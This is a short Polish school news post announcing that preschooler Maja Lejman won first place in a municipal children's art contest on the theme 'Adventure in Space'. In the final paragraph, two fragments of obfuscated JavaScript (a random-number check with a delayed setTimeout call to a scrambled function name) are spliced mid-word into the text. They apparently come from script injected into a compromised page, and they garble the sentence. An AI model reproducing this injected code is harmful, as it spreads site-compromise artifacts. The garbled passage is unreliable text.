I miejsce Mai Lejman w IV Gminnym Konkursie Plastycznym „Świat wokół nas”

2 czerwca 2015 roku dzieci z oddziału przedszkolnego naszej szkoły skorzystały z zaproszenia Publicznego Przedszkola w Studzieńcu i wzięły udział w IV Gminnym Konkursie Plastycznym „Świat wokół nas…”.

Celem konkursu było inspirowanie zainteresowań plastycznych oraz promocja uzdolnionych twórców, czerpanie radości z procesu tworzenia i integrowanie dzieci z różnych placówek. Tegoroczne hasło konkursu brzmiało „PRZYGODA W KOSMOSIE”.

W skład komisji konkursowej weszli wszyscy opiekunowie dzieci a oceniając wykonane prace plastyczne brali pod uwagę zgodność pracy plastycznej z tematem, walory artystyczne, pomysłowość i estetykę.

Nasza szkołę reprezentowały: Majka Lejman, Gabrysia Chrześcijańska i Nikola Brzezińska.

Komisja konkursowa miała nie lada problem z wyborem najlepszych i najciekawszych prac. Po burzliwych obradach I miejscedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} w konkursie przypadło Mai Lejmandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}.

GRATULUJEMY!!!